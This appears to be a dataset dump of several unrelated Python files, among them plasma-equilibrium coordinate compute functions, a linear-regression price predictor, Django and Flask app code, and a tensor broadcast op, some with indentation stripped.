name="omega_rt",
label="\\partial_{\\rho \\theta} \\omega",
units="rad",
units_long="radians",
description="Toroidal stream function, second derivative wrt radius and "
"poloidal angle",
dim=1,
params=[], # ["W_lmn"]
transforms={},
profiles=[],
coordinates="rtz",
data=["0"],
)
def _omega_rt(params, transforms, profiles, data, **kwargs):
data["omega_rt"] = data["0"]
return data
@register_compute_fun(
name="omega_rtt",
label="\\partial_{\\rho \\theta \\theta} \\omega",
units="rad",
units_long="radians",
description="Toroidal stream function, third derivative wrt radius and "
"poloidal angle twice",
dim=1,
params=[], # ["W_lmn"]
transforms={},
profiles=[],
coordinates="rtz",
data=["0"],
)
def _omega_rtt(params, transforms, profiles, data, **kwargs):
data["omega_rtt"] = data["0"]
return data
@register_compute_fun(
    name="omega_rttt",
    label="\\partial_{\\rho \\theta \\theta \\theta} \\omega",
    units="rad",
    units_long="radians",
    # Fixed description: one radial + three poloidal derivatives is a
    # fourth derivative, not a third (matches the rttz/rtzz wording).
    description="Toroidal stream function, fourth derivative wrt radius once "
    "and poloidal angle thrice",
    dim=1,
    params=[],  # ["W_lmn"]
    transforms={},
    profiles=[],
    coordinates="rtz",
    data=["0"],
)
def _omega_rttt(params, transforms, profiles, data, **kwargs):
    """d^4(omega)/(d(rho) d(theta)^3); identically zero (W_lmn unsupported)."""
    data["omega_rttt"] = data["0"]
    return data
@register_compute_fun(
name="omega_rttz",
label="\\partial_{\\rho \\theta \\theta \\zeta} \\omega",
units="rad",
units_long="radians",
description="Toroidal stream function, fourth derivative wrt radius once, "
"poloidal angle twice, and toroidal angle once",
dim=1,
params=[], # ["W_lmn"]
transforms={},
profiles=[],
coordinates="rtz",
data=["0"],
)
def _omega_rttz(params, transforms, profiles, data, **kwargs):
data["omega_rttz"] = data["0"]
return data
@register_compute_fun(
name="omega_rtz",
label="\\partial_{\\rho \\theta \\zeta} \\omega",
units="rad",
units_long="radians",
description="Toroidal stream function, third derivative wrt radius, poloidal"
" angle, and toroidal angle",
dim=1,
params=[], # ["W_lmn"]
transforms={},
profiles=[],
coordinates="rtz",
data=["0"],
)
def _omega_rtz(params, transforms, profiles, data, **kwargs):
data["omega_rtz"] = data["0"]
return data
@register_compute_fun(
name="omega_rtzz",
label="\\partial_{\\rho \\theta \\zeta \\zeta} \\omega",
units="rad",
units_long="radians",
description="Toroidal stream function, fourth derivative wrt radius, poloidal"
" angle, and toroidal angle twice",
dim=1,
params=[], # ["W_lmn"]
transforms={},
profiles=[],
coordinates="rtz",
data=["0"],
)
def _omega_rtzz(params, transforms, profiles, data, **kwargs):
data["omega_rtzz"] = data["0"]
return data
@register_compute_fun(
name="omega_rz",
label="\\partial_{\\rho \\zeta} \\omega",
units="rad",
units_long="radians",
description="Toroidal stream function, second derivative wrt radius and "
"toroidal angle",
dim=1,
params=[], # ["W_lmn"]
transforms={},
profiles=[],
coordinates="rtz",
data=["0"],
)
def _omega_rz(params, transforms, profiles, data, **kwargs):
data["omega_rz"] = data["0"]
return data
@register_compute_fun(
name="omega_rzz",
label="\\partial_{\\rho \\zeta \\zeta} \\omega",
units="rad",
units_long="radians",
description="Toroidal stream function, third derivative wrt radius and "
"toroidal angle twice",
dim=1,
params=[], # ["W_lmn"]
transforms={},
profiles=[],
coordinates="rtz",
data=["0"],
)
def _omega_rzz(params, transforms, profiles, data, **kwargs):
data["omega_rzz"] = data["0"]
return data
@register_compute_fun(
    name="omega_rzzz",
    label="\\partial_{\\rho \\zeta \\zeta \\zeta} \\omega",
    units="rad",
    units_long="radians",
    # Fixed description: one radial + three toroidal derivatives is a
    # fourth derivative, not a third (matches the rttz/rtzz wording).
    description="Toroidal stream function, fourth derivative wrt radius once "
    "and toroidal angle thrice",
    dim=1,
    params=[],  # ["W_lmn"]
    transforms={},
    profiles=[],
    coordinates="rtz",
    data=["0"],
)
def _omega_rzzz(params, transforms, profiles, data, **kwargs):
    """d^4(omega)/(d(rho) d(zeta)^3); identically zero (W_lmn unsupported)."""
    data["omega_rzzz"] = data["0"]
    return data
@register_compute_fun(
name="omega_t",
label="\\partial_{\\theta} \\omega",
units="rad",
units_long="radians",
description="Toroidal stream function, first poloidal derivative",
dim=1,
params=[], # ["W_lmn"]
transforms={},
profiles=[],
coordinates="rtz",
data=["0"],
)
def _omega_t(params, transforms, profiles, data, **kwargs):
data["omega_t"] = data["0"]
return data
@register_compute_fun(
name="omega_tt",
label="\\partial_{\\theta \\theta} \\omega",
units="rad",
units_long="radians",
description="Toroidal stream function, second poloidal derivative",
dim=1,
params=[], # ["W_lmn"]
transforms={},
profiles=[],
coordinates="rtz",
data=["0"],
)
def _omega_tt(params, transforms, profiles, data, **kwargs):
data["omega_tt"] = data["0"]
return data
@register_compute_fun(
name="omega_ttt",
label="\\partial_{\\theta \\theta \\theta} \\omega",
units="rad",
units_long="radians",
description="Toroidal stream function, third poloidal derivative",
dim=1,
params=[], # ["W_lmn"]
transforms={},
profiles=[],
coordinates="rtz",
data=["0"],
)
def _omega_ttt(params, transforms, profiles, data, **kwargs):
data["omega_ttt"] = data["0"]
return data
@register_compute_fun(
name="omega_ttz",
label="\\partial_{\\theta \\theta \\zeta} \\omega",
units="rad",
units_long="radians",
description="Toroidal stream function, third derivative wrt poloidal angle "
"twice and toroidal angle",
dim=1,
params=[], # ["W_lmn"]
transforms={},
profiles=[],
coordinates="rtz",
data=["0"],
)
def _omega_ttz(params, transforms, profiles, data, **kwargs):
data["omega_ttz"] = data["0"]
return data
@register_compute_fun(
name="omega_tz",
label="\\partial_{\\theta \\zeta} \\omega",
units="rad",
units_long="radians",
description="Toroidal stream function, second derivative wrt poloidal and "
"toroidal angles",
dim=1,
params=[], # ["W_lmn"]
transforms={},
profiles=[],
coordinates="rtz",
data=["0"],
)
def _omega_tz(params, transforms, profiles, data, **kwargs):
data["omega_tz"] = data["0"]
return data
@register_compute_fun(
name="omega_tzz",
label="\\partial_{\\theta \\zeta \\zeta} \\omega",
units="rad",
units_long="radians",
description="Toroidal stream function, third derivative wrt poloidal angle "
"and toroidal angle twice",
dim=1,
params=[], # ["W_lmn"]
transforms={},
profiles=[],
coordinates="rtz",
data=["0"],
)
def _omega_tzz(params, transforms, profiles, data, **kwargs):
data["omega_tzz"] = data["0"]
return data
@register_compute_fun(
name="omega_z",
label="\\partial_{\\zeta} \\omega",
units="rad",
units_long="radians",
description="Toroidal stream function, first toroidal derivative",
dim=1,
params=[], # ["W_lmn"]
transforms={},
profiles=[],
coordinates="rtz",
data=["0"],
)
def _omega_z(params, transforms, profiles, data, **kwargs):
data["omega_z"] = data["0"]
return data
@register_compute_fun(
name="omega_zz",
label="\\partial_{\\zeta \\zeta} \\omega",
units="rad",
units_long="radians",
description="Toroidal stream function, second toroidal derivative",
dim=1,
params=[], # ["W_lmn"]
transforms={},
profiles=[],
coordinates="rtz",
data=["0"],
)
def _omega_zz(params, transforms, profiles, data, **kwargs):
data["omega_zz"] = data["0"]
return data
@register_compute_fun(
name="omega_zzz",
label="\\partial_{\\zeta \\zeta \\zeta} \\omega",
units="rad",
units_long="radians",
description="Toroidal stream function, third toroidal derivative",
dim=1,
params=[], # ["W_lmn"]
transforms={},
profiles=[],
coordinates="rtz",
data=["0"],
)
def _omega_zzz(params, transforms, profiles, data, **kwargs):
data["omega_zzz"] = data["0"]
return data
@register_compute_fun(
    name="phi",
    label="\\phi",
    units="rad",
    units_long="radians",
    description="Toroidal angle in lab frame",
    dim=1,
    params=[],
    transforms={},
    profiles=[],
    coordinates="rtz",
    data=["zeta", "omega"],
)
def _phi(params, transforms, profiles, data, **kwargs):
    """Lab-frame toroidal angle: phi = zeta + omega."""
    lab_angle = data["zeta"] + data["omega"]
    data["phi"] = lab_angle
    return data
@register_compute_fun(
name="phi_r",
label="\\partial_{\\rho} \\phi",
units="rad",
units_long="radians",
description="Toroidal angle in lab frame, derivative wrt radial coordinate",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="rtz",
data=["omega_r"],
)
def _phi_r(params, transforms, profiles, data, **kwargs):
data["phi_r"] = data["omega_r"]
return data
@register_compute_fun(
name="phi_rr",
label="\\partial_{\\rho \\rho} \\phi",
units="rad",
units_long="radians",
description="Toroidal angle in lab frame, second derivative wrt radial coordinate",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="rtz",
data=["omega_rr"],
)
def _phi_rr(params, transforms, profiles, data, **kwargs):
data["phi_rr"] = data["omega_rr"]
return data
@register_compute_fun(
name="phi_rt",
label="\\partial_{\\rho \\theta} \\phi",
units="rad",
units_long="radians",
description="Toroidal angle in lab frame, second derivative wrt radial and "
"poloidal coordinate",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="rtz",
data=["omega_rt"],
)
def _phi_rt(params, transforms, profiles, data, **kwargs):
data["phi_rt"] = data["omega_rt"]
return data
@register_compute_fun(
name="phi_rz",
label="\\partial_{\\rho \\zeta} \\phi",
units="rad",
units_long="radians",
description="Toroidal angle in lab frame, second derivative wrt radial and "
"toroidal coordinate",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="rtz",
data=["omega_rz"],
)
def _phi_rz(params, transforms, profiles, data, **kwargs):
data["phi_rz"] = data["omega_rz"]
return data
@register_compute_fun(
name="phi_t",
label="\\partial_{\\theta} \\phi",
units="rad",
units_long="radians",
description="Toroidal angle in lab frame, derivative wrt poloidal coordinate",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="rtz",
data=["omega_t"],
)
def _phi_t(params, transforms, profiles, data, **kwargs):
data["phi_t"] = data["omega_t"]
return data
@register_compute_fun(
name="phi_tt",
label="\\partial_{\\theta \\theta} \\phi",
units="rad",
units_long="radians",
description="Toroidal angle in lab frame, second derivative wrt poloidal "
"coordinate",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="rtz",
data=["omega_tt"],
)
def _phi_tt(params, transforms, profiles, data, **kwargs):
data["phi_tt"] = data["omega_tt"]
return data
@register_compute_fun(
name="phi_tz",
label="\\partial_{\\theta \\zeta} \\phi",
units="rad",
units_long="radians",
description="Toroidal angle in lab frame, second derivative wrt poloidal and "
"toroidal coordinate",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="rtz",
data=["omega_tz"],
)
def _phi_tz(params, transforms, profiles, data, **kwargs):
data["phi_tz"] = data["omega_tz"]
return data
@register_compute_fun(
    name="phi_z",
    label="\\partial_{\\zeta} \\phi",
    units="rad",
    units_long="radians",
    description="Toroidal angle in lab frame, derivative wrt toroidal coordinate",
    dim=1,
    params=[],
    transforms={},
    profiles=[],
    coordinates="rtz",
    data=["omega_z"],
)
def _phi_z(params, transforms, profiles, data, **kwargs):
    """d(phi)/d(zeta): since phi = zeta + omega, this is 1 + d(omega)/d(zeta)."""
    data["phi_z"] = data["omega_z"] + 1
    return data
@register_compute_fun(
name="phi_zz",
label="\\partial_{\\zeta \\zeta} \\phi",
units="rad",
units_long="radians",
description="Toroidal angle in lab frame, second derivative wrt toroidal "
"coordinate",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="rtz",
data=["omega_zz"],
)
def _phi_zz(params, transforms, profiles, data, **kwargs):
data["phi_zz"] = data["omega_zz"]
return data
@register_compute_fun(
    name="rho",
    label="\\rho",
    units="~",
    units_long="None",
    description="Radial coordinate, proportional to the square root "
    + "of the toroidal flux",
    dim=1,
    params=[],
    transforms={"grid": []},
    profiles=[],
    coordinates="r",
    data=[],
)
def _rho(params, transforms, profiles, data, **kwargs):
    """Radial coordinate: the first column of the grid's node array."""
    nodes = transforms["grid"].nodes
    data["rho"] = nodes[:, 0]
    return data
@register_compute_fun(
name="rho_r",
label="\\partial_{\\rho} \\rho",
units="~",
units_long="None",
description="Radial coordinate, proportional to the square root "
+ "of the toroidal flux, derivative wrt radial coordinate",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="r",
data=["0"],
)
def _rho_r(params, transforms, profiles, data, **kwargs):
data["rho_r"] = jnp.ones_like(data["0"])
return data
@register_compute_fun(
name="rho_t",
label="\\partial_{\\theta} \\rho",
units="~",
units_long="None",
description="Radial coordinate, proportional to the square root "
"of the toroidal flux, derivative wrt poloidal coordinate",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="r",
data=["0"],
)
def _rho_t(params, transforms, profiles, data, **kwargs):
data["rho_t"] = data["0"]
return data
@register_compute_fun(
name="rho_z",
label="\\partial_{\\zeta} \\rho",
units="~",
units_long="None",
description="Radial coordinate, proportional to the square root "
"of the toroidal flux, derivative wrt toroidal coordinate",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="r",
data=["0"],
)
def _rho_z(params, transforms, profiles, data, **kwargs):
data["rho_z"] = data["0"]
return data
@register_compute_fun(
name="theta",
label="\\theta",
units="rad",
units_long="radians",
description="Poloidal angular coordinate (geometric, not magnetic)",
dim=1,
params=[],
transforms={"grid": []},
profiles=[],
coordinates="t",
data=[],
)
def _theta(params, transforms, profiles, data, **kwargs):
data["theta"] = transforms["grid"].nodes[:, 1]
return data
@register_compute_fun(
    name="theta_PEST",
    label="\\vartheta",
    units="rad",
    units_long="radians",
    description="PEST straight field line poloidal angular coordinate",
    dim=1,
    params=[],
    transforms={},
    profiles=[],
    coordinates="rtz",
    data=["theta", "lambda"],
)
def _theta_PEST(params, transforms, profiles, data, **kwargs):
    """PEST angle: vartheta = theta + lambda, wrapped onto [0, 2*pi)."""
    vartheta = data["theta"] + data["lambda"]
    data["theta_PEST"] = vartheta % (2 * jnp.pi)
    return data
@register_compute_fun(
name="theta_PEST_r",
label="\\partial_{\\rho} \\vartheta",
units="rad",
units_long="radians",
description="PEST straight field line poloidal angular coordinate, derivative wrt "
"radial coordinate",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="rtz",
data=["lambda_r"],
)
def _theta_PEST_r(params, transforms, profiles, data, **kwargs):
data["theta_PEST_r"] = data["lambda_r"]
return data
@register_compute_fun(
name="theta_PEST_t",
label="\\partial_{\\theta} \\vartheta",
units="rad",
units_long="radians",
description="PEST straight field line poloidal angular coordinate, derivative wrt "
"poloidal coordinate",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="rtz",
data=["lambda_t"],
)
def _theta_PEST_t(params, transforms, profiles, data, **kwargs):
data["theta_PEST_t"] = 1 + data["lambda_t"]
return data
@register_compute_fun(
name="theta_PEST_z",
label="\\partial_{\\zeta} \\vartheta",
units="rad",
units_long="radians",
description="PEST straight field line poloidal angular coordinate, derivative wrt "
"toroidal coordinate",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="rtz",
data=["lambda_z"],
)
def _theta_PEST_z(params, transforms, profiles, data, **kwargs):
data["theta_PEST_z"] = data["lambda_z"]
return data
@register_compute_fun(
name="theta_r",
label="\\partial_{\\rho} \\theta",
units="rad",
units_long="radians",
description="Poloidal angular coordinate (geometric, not magnetic), "
"derivative wrt radial coordinate",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="t",
data=["0"],
)
def _theta_r(params, transforms, profiles, data, **kwargs):
data["theta_r"] = data["0"]
return data
@register_compute_fun(
name="theta_t",
label="\\partial_{\\theta} \\theta",
units="rad",
units_long="radians",
description="Poloidal angular coordinate (geometric, not magnetic), "
"derivative wrt poloidal coordinate",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="t",
data=["0"],
)
def _theta_t(params, transforms, profiles, data, **kwargs):
data["theta_t"] = jnp.ones_like(data["0"])
return data
@register_compute_fun(
name="theta_z",
label="\\partial_{\\zeta} \\theta",
units="rad",
units_long="radians",
description="Poloidal angular coordinate (geometric, not magnetic), "
"derivative wrt toroidal coordinate",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="t",
data=["0"],
)
def _theta_z(params, transforms, profiles, data, **kwargs):
data["theta_z"] = data["0"]
return data
@register_compute_fun(
name="zeta",
label="\\zeta",
units="rad",
units_long="radians",
description="Toroidal angular coordinate",
dim=1,
params=[],
transforms={"grid": []},
profiles=[],
coordinates="z",
data=[],
)
def _zeta(params, transforms, profiles, data, **kwargs):
data["zeta"] = transforms["grid"].nodes[:, 2]
return data
@register_compute_fun(
name="zeta_r",
label="\\partial_{\\rho} \\zeta",
units="rad",
units_long="radians",
description="Toroidal angular coordinate derivative, wrt radial coordinate",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="z",
data=["0"],
)
def _zeta_r(params, transforms, profiles, data, **kwargs):
data["zeta_r"] = data["0"]
return data
@register_compute_fun(
name="zeta_t",
label="\\partial_{\\theta} \\zeta",
units="rad",
units_long="radians",
description="Toroidal angular coordinate, derivative wrt poloidal coordinate",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="z",
data=["0"],
)
def _zeta_t(params, transforms, profiles, data, **kwargs):
data["zeta_t"] = data["0"]
return data
@register_compute_fun(
name="zeta_z",
label="\\partial_{\\zeta} \\zeta",
units="rad",
units_long="radians",
description="Toroidal angular coordinate, derivative wrt toroidal coordinate",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="z",
data=["0"],
)
def _zeta_z(params, transforms, profiles, data, **kwargs):
data["zeta_z"] = jnp.ones_like(data["0"])
return data
|
19,255 | a280e5c5034ceff3aaa51c2155191f65378337a9 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Jun 29 01:09:04 2018
@author: aditi
"""
'''
This program trains linear model and prints
confidence on both test and cross validation set '
The plot_result function prints the actual and
predicted price for the next day
'''
import data_prep
from sklearn import linear_model
import pandas as pd
from matplotlib import pyplot as plt ,style
pd.options.mode.chained_assignment = None # default='warn'
style.use('ggplot')
def train(filename):
    """Fit a linear regression on features derived from `filename`.

    Prints the R^2 score (scaled to a percentage) on the held-out test set
    and on the cross-validation set, then returns the cross-validation
    target frame with a 'predictions' column appended.
    """
    df = data_prep.get_data(filename)
    [X, y] = data_prep.features(df)
    # feature_scaling/data_set are expected to return aligned
    # train/test/cross splits — see data_prep module.
    [X_train, X_test, X_cross] = data_prep.feature_scaling(X)
    [y_train, y_test, y_cross] = data_prep.data_set(y)
    lm = linear_model.LinearRegression()
    model = lm.fit(X_train.values,y_train.values) # training model on training set
    predictions = model.predict(X_test.values)
    print("confidence on test set is ",lm.score(X_test.values, y_test.values)*100)
    # `predictions` is rebound to the cross-validation predictions; the
    # test-set predictions above are discarded after scoring.
    predictions = model.predict(X_cross.values)
    print("confidence on cross validation set is ",lm.score(X_cross.values ,y_cross.values)*100)
    y_cross['predictions'] = predictions
    return y_cross
def plot_result(filename):
    """Plot the actual vs. predicted next-day price on the cross-validation set."""
    results = train(filename)
    results['1DayW'].plot()
    plt.legend(loc=4)
    results['predictions'].plot(color='b')
    plt.legend(loc=4)
    plt.xlabel('Date')
    plt.ylabel('Price')
    plt.show()
|
19,256 | 3ab3c1267a2fd4fa07c55d1a4ce4956e7612fcc8 | # -*- coding: utf-8 -*-
from odoo import models, fields, api
class tms_vehicle_red_tape_type(models.Model):
    """Catalog of red-tape (paperwork) types for fleet vehicles."""

    _name = 'fleet.vehicle.red_tape_type'
    _inherit = ['mail.thread']

    name = fields.Char(string='Nombre')
    parent_id = fields.Many2one('fleet.vehicle.red_tape_type', string='Padre')
    tipo = fields.Selection(
        selection=[('view', 'Ver'), ('normal', 'Normal')],
        string='Tipo',
        default='view',
    )
    notes = fields.Text(string='Notas')
    # NOTE(review): `active` has Odoo's record-archiving semantics but is
    # labelled 'Outsourcing?' — confirm the label is intentional.
    active = fields.Boolean(string='Outsourcing?')
|
19,257 | bd9198869ab441e801bf7b87d5a9babb08ef4e6e | from django.urls import include, path
from . import views
# URL routes for this app; the view callables live in the sibling views module.
urlpatterns = [
    path('', views.homePageView, name='index'),
    path('apiresults/', views.searchCloudView, name='apiresults'),
    path('vagresults/', views.vagrantObjectsView, name='vagresults'),
    path('apiBoxDetail/', views.apiBoxDetailView, name='apiBoxDetail'),
    #path('archive/', views.blog.archive),
] 
19,258 | 88939093d82356c81256c2fe5849091847e830bf | from __future__ import absolute_import
import numpy as np
from .Node import Op, NAME_RULE, PROFILING_MODE
from .. import profiler
from .._base import get_array_memory
class Conv2d_BroadcastToOp(Op):
    """Broadcast a small tensor (e.g. a conv bias of shape (C,)) to the
    NCHW shape of a conv feature map given by the second input node."""

    def __call__(self, node_A, node_B):
        """Create the broadcast node.

        node_A is the Node to broadcast; node_B supplies the target shape
        (the op's output shape, per infer_shape).
        """
        new_node = Op.__call__(self)
        new_node.inputs = [node_A, node_B]
        new_node.profiler = None
        if PROFILING_MODE == 1:
            new_node.profiler = profiler.CreateProfiler()
        if NAME_RULE == 0:
            new_node.name = "Conv2d_BroadcastTo(%s,%s.shape)" % (
                node_A.name, node_B.name)
        elif NAME_RULE == 1:
            new_node.name = "Conv2d_BroadcastTo"
        else:
            new_node.name = "Conv2d_BroadcastTo" + str(new_node.id)
            new_node.desc = new_node.name + \
                "(%s,%s.shape)" % (node_A.name, node_B.name)
        return new_node

    def profile(self, node, input_vals, output_val, is_static = True):
        """Record memory footprint (static) or a measured run time (dynamic)."""
        assert len(input_vals) == 2
        if is_static:
            # input memory
            node.profiler.input_memory = get_array_memory(input_vals[0].shape) + \
                get_array_memory(input_vals[1].shape)
            # output memory
            node.profiler.output_memory = get_array_memory(output_val.shape)
            # no workspace
            node.profiler.workspace_memory = 0
            # execute time
            # NOTE(review): multiplying by FLOPS_PER_SECOND (rather than
            # dividing) looks suspicious but is kept as the original estimate.
            node.profiler.time = node.profiler.output_memory / 4 * profiler.FLOPS_PER_SECOND
        else:
            import time
            start = time.time()
            from ..gpu_links import broadcast_to
            broadcast_to(input_vals[0], output_val, None, node.profiler)
            node.profiler.time = (time.time() - start) * 1000

    def compute(self, node, input_vals, output_val, use_numpy=True, stream_handle=None):
        """Write the broadcast of input_vals[0] (to input_vals[1].shape) into output_val."""
        assert(len(input_vals) == 2)
        if use_numpy:
            # Broadcast against the reference shape with axes 1 and 3 swapped
            # (N, W, H, C) so a (C,)-shaped input lines up against the trailing
            # axis, then swap back to NCHW. BUGFIX: the previous code computed
            # this swapped shape but never used it -- it broadcast to the
            # unswapped shape and then swapped axes, which raises (or silently
            # mismatches) whenever C != W.
            shapeW = list(input_vals[1].shape)
            shapeW[1], shapeW[3] = shapeW[3], shapeW[1]
            output_val[:] = np.broadcast_to(
                input_vals[0], shapeW).swapaxes(1, 3)
        else:
            from ..gpu_links import broadcast_to
            broadcast_to(input_vals[0], output_val, stream_handle, None)

    def gradient(self, node, output_grad):
        """Gradient: sum the output grad back to node_A; node_B only supplies a shape."""
        from .Conv2dReduceSum import conv2d_reducesum_op
        from .ZerosLike import zeroslike_op
        grad_A = conv2d_reducesum_op(output_grad)
        grad_B = zeroslike_op(node.inputs[1])
        return [grad_A, grad_B]

    def infer_shape(self, node, input_shapes):
        """The output shape is exactly the second input's shape."""
        assert len(input_shapes) == 2
        return input_shapes[1]
def conv2d_broadcastto_op(node_A, node_B):
    """Factory for a node representing np.broadcast_to(node_A, node_B.shape).

    node_A is the Node to be broadcast; node_B is a Node carrying the
    target shape. Returns the new Node produced by the op.
    """
    op = Conv2d_BroadcastToOp()
    return op(node_A, node_B)
|
19,259 | 92fdc4988fdf0344298b4027859a8969be285575 | import sys
import argparse
def argumentSetup():
    """Build the CLI parser and return the parsed arguments."""
    cli = argparse.ArgumentParser(
        description='Determine if a string contains duplicates.')
    cli.add_argument('string', type=str, help='the input string')
    return cli.parse_args()
def checkUniqueChars(string):
    """Return True if *string* contains no repeated characters.

    Uses a set of seen characters, so any Unicode input is supported.
    The previous fixed-size 128-slot table raised IndexError for any
    character above code point 127; it also left the enumerate index
    unused and compared booleans with `== True`.
    """
    seen = set()
    for char in string:
        if char in seen:
            return False
        seen.add(char)
    return True
def main():
    """Entry point: report whether the input string is duplicate-free."""
    parsed = argumentSetup()
    verdict = checkUniqueChars(parsed.string)
    message = (
        "PASS: String contains only unique characters"
        if verdict
        else "FAIL: String contains duplicate characters"
    )
    print(message)
# Run only when executed as a script, not when imported.
if __name__ == "__main__":
    main()
19,260 | 1814611996e31b4785d36fa856704694a7c37b2d | from test_cases import *
class Network(object):
    """Network checks to ensure an app could run correctly"""
    logger = logging.getLogger(__name__)

    @staticmethod
    def check_local_internet():
        """Ping the configured outer source from this machine and validate the response."""
        Network.logger.debug(cons.DEBUG_CONNECTION_STAGE)
        Network.logger.info(cons.INFO_CHECKING_LOCAL_WEB_AVAILABILITY)
        response = UnixCommands.ping(cons.OUTER_SOURCE)
        Inspection.is_pinging_local(response, Network)

    @staticmethod
    def check_host_availability():
        """Ping the target server's IP from this machine and validate the response."""
        Network.logger.info(cons.INFO_CHECKING_HOST_AVAILABILITY)
        response = UnixCommands.ping(var.SERVER_IP)
        # NOTE(review): validates with is_pinging_local even though the target
        # is the remote server -- confirm is_pinging_remote is not intended here.
        Inspection.is_pinging_local(response, Network)

    @staticmethod
    def check_remote_internet():
        """Run a web ping from the remote server itself and validate the response."""
        Network.logger.info(cons.INFO_CHECKING_REMOTE_WEB_AVAILABILITY)
        response = UnixCommands.remote_ping_web(var.SERVER_NAME, var.SERVER_IP, cons.PING_OUTER_SOURCE)
        Inspection.is_pinging_remote(response, Network)
|
19,261 | 84388f3da351458f9b82e5c4c2157c2812fb1039 | #!/usr/bin/env python
"""
Example of using plt.axvline() to plot a a vertical line on a Matplotlib plot.
"""
import numpy as np
import matplotlib.pyplot as plt
# Sample data: 100 draws from a standard normal distribution.
values = np.random.randn(100)
plt.hist(values, label='values')
# Mark the sample mean with a thick dashed red vertical line.
plt.axvline(values.mean(), color='red', linestyle='--', linewidth=4, label='mean')
plt.legend()
plt.show()
19,262 | 3b04122617936e3f1f4966d42c1dd92b2704e011 | from flask import (
Blueprint,
render_template,
request,
url_for,
g,
redirect,
session,
jsonify,
)
from invman.db import get_db
from invman.start import login_required
bp = Blueprint("main", __name__, url_prefix="/main")
def product_list(id):
    """Return all in-stock products (id, name, quantity) for business *id*."""
    connection = get_db()
    rows = connection.execute(
        "SELECT product_id, product_name, quantity FROM product WHERE for_business = ? AND quantity > 0",
        (id,),
    ).fetchall()
    return rows
def get_product(location, product_id, quantity):
    """ Used by the movement route to get a product from a location. """
    # Deducts `quantity` from the source location's stock and returns
    # [product_id, quantity] for set_product() to apply at the destination.
    # Raises Exception("Invalid quantity.") if the deduction would go negative.
    product_array = []
    db = get_db()
    b_id = session.get("user_id")
    if location == "product_factory":
        # Get product from product table, deduct the quantity
        ogquantity = db.execute(
            "SELECT quantity FROM product WHERE product_id = ? AND for_business = ?",
            (product_id, b_id,),
        ).fetchone()[0]
        newquantity = ogquantity - quantity
        if int(newquantity) < 0:
            raise Exception("Invalid quantity.")
        query = (
            "UPDATE product SET quantity = ? WHERE product_id = ? AND for_business = ?"
        )
        db.execute(query, (newquantity, product_id, b_id))
        p = db.execute(
            "SELECT product_id FROM product WHERE for_business = ? AND product_id = ?",
            (b_id, product_id,),
        ).fetchone()
        product_array = list(p)
        product_array.append(quantity)
        db.commit()
        return product_array
    else:
        # Source is a warehouse location rather than the factory table.
        ogquantity = db.execute(
            "SELECT qty FROM warehouse WHERE loc_id = ? AND prod_id = ? AND b_id = ?",
            (location, product_id, b_id,),
        ).fetchone()[0]
        newquantity = ogquantity - quantity
        if int(newquantity) < 0:
            raise Exception("Invalid quantity.")
        query = (
            "UPDATE warehouse SET qty = ? where loc_id = ? AND prod_id = ? AND b_id = ?"
        )
        db.execute(query, (newquantity, location, product_id, b_id,))
        p = db.execute(
            "SELECT prod_id FROM warehouse WHERE prod_id = ? AND loc_id = ? AND b_id = ?",
            (product_id, location, b_id,),
        ).fetchone()
        if int(newquantity) == 0:
            # Drop the warehouse row entirely once it is empty.
            db.execute(
                "DELETE FROM warehouse WHERE b_id = ? AND prod_id = ? AND loc_id = ?",
                (b_id, product_id, location,),
            )
        product_array = list(p)
        product_array.append(quantity)
        db.commit()
        return product_array
def set_product(location, product_array):
    """ Used by the movement route to set a product to a location. """
    # product_array is [product_id, quantity] as produced by get_product().
    # A destination of "Move out" means the stock leaves the system, so
    # nothing is recorded.
    db = get_db()
    b_id = session.get("user_id")
    product_id = product_array[0]
    quantity = product_array[1]
    if location != "Move out":
        product_exists = db.execute(
            "SELECT * FROM warehouse WHERE prod_id = ? AND loc_id = ? AND b_id = ?",
            (product_id, location, b_id),
        ).fetchone()
        if product_exists:
            # Product already stocked at this location: add to the quantity.
            ogquantity = db.execute(
                "SELECT qty FROM warehouse WHERE loc_id = ? AND prod_id = ? AND b_id = ?",
                (location, product_id, b_id,),
            ).fetchone()[0]
            newquantity = ogquantity + quantity
            query = "UPDATE warehouse SET qty = ? WHERE loc_id = ? AND prod_id = ? AND b_id = ?"
            db.execute(query, (newquantity, location, product_id, b_id,))
            db.commit()
        else:
            # First time this product is stored at this location.
            db.execute(
                "INSERT INTO warehouse (b_id, prod_id, qty, loc_id) values (?, ?, ?, ?)",
                (b_id, product_id, quantity, location),
            )
            db.commit()
def balance_quantity(quantity, product_id, location):
    """ Used by the product route to add or subtract quantity of a product."""
    # `quantity` may be negative (a deduction); the result must not go
    # below zero.
    db = get_db()
    if location == "product_factory":
        # NOTE(review): unlike the other product queries in this module, these
        # do not filter by for_business -- confirm product_id alone is unique
        # across businesses.
        ogquantity = db.execute(
            "SELECT quantity from product WHERE product_id = ?", (product_id,)
        ).fetchone()
        ogquantity = ogquantity["quantity"]
        newquantity = ogquantity + quantity
        if int(newquantity) < 0:
            raise Exception("Invalid quantity.")
        query = "UPDATE product SET quantity = ? where product_id = ?"
        db.execute(query, (newquantity, product_id))
        db.commit()
@bp.route("/<id>/delete", methods=("GET",))
def delete(id):
""" Used by the product page to delete a product. Doesn't actually delete it, just sets the quantity to 0. """
db = get_db()
b_id = session.get("user_id")
query = "UPDATE product SET quantity = 0 WHERE product_id = ? AND for_business = ?"
db.execute(query, (id, b_id,))
db.commit()
